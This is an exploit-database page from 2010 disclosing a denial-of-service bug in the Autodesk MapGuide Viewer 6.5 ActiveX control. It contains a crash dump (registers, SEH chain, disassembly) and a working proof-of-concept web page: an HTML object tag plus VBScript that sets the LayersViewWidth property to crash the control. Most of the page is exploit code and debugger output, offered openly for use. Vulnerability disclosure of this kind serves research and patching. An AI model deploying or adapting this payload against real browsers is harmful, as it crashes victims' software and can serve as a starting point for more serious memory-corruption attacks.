Autodesk MapGuide Viewer ActiveX Denial of Service
Posted on 01 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Autodesk MapGuide Viewer ActiveX Denial of Service</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================== Autodesk MapGuide Viewer ActiveX Denial of Service ================================================== # Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability # Date: [01-09-2010] # Author: [d3b4g] # Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821 # Version: [6.5] # Tested on: [Winxp SP3] # regards to ROL guys Exception Code: ACCESS_VIOLATION Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL) Seh Chain: -------------------------------------------------- 1 192847C MGAXCTRL.DLL 2 73352542 VBSCRIPT.dll 3 7C839AD8 KERNEL32.dll Registers: -------------------------------------------------- EIP 0175CE9E EAX 00000001 EBX 003EB690 -> 0193F684 ECX 00000000 EDX 003E0608 -> 00180F98 EDI 003EB5D8 -> 0193FC24 ESI 00000404 EBP 0013EA84 -> 0013EAA0 ESP 0013EA58 -> 003EB644 ArgDump: -------------------------------------------------- EBP+8 003EB644 -> 0193F90C EBP+12 00000000 EBP+16 0013EAD4 -> 00130000 EBP+20 0042C4F4 -> 00110024 EBP+24 0013EA94 -> 0013EAD4 EBP+28 0013EB30 -> 0013EBC0 Block Disassembly: -------------------------------------------------- 175CE8F POP ESI 175CE90 JMP [EAX+60] 175CE93 PUSH ESI 175CE94 LEA ESI,[ECX+404] 175CE9A TEST ESI,ESI 175CE9C JE SHORT 0175CEC2 175CE9E CMP DWORD PTR [ESI+1C],0 <--- CRASH 175CEA2 JE SHORT 0175CEC2 175CEA4 PUSH 0 175CEA6 PUSH DWORD PTR [ESP+C] 175CEAA MOV ECX,ESI 175CEAC PUSH 0 175CEAE CALL 01912C63 175CEB3 MOV EAX,[ESI] 175CEB5 MOV ECX,ESI PoC: <object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' /> <script language='vbscript'> 'File Generated by COMRaider v0.0.133 - http://labs.idefense.com 'Wscript.echo typename(target) 'for debugging/custom prolog targetFile = "C:Program FilesAutodeskMapGuideViewerActiveX6.5MgAxCtrl.dll" prototype = "Property Let LayersViewWidth As Long" memberName = "LayersViewWidth" progid = "MGMapControl.MGMap" argCount = 1 arg1=0 target.LayersViewWidth = arg1 </script> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
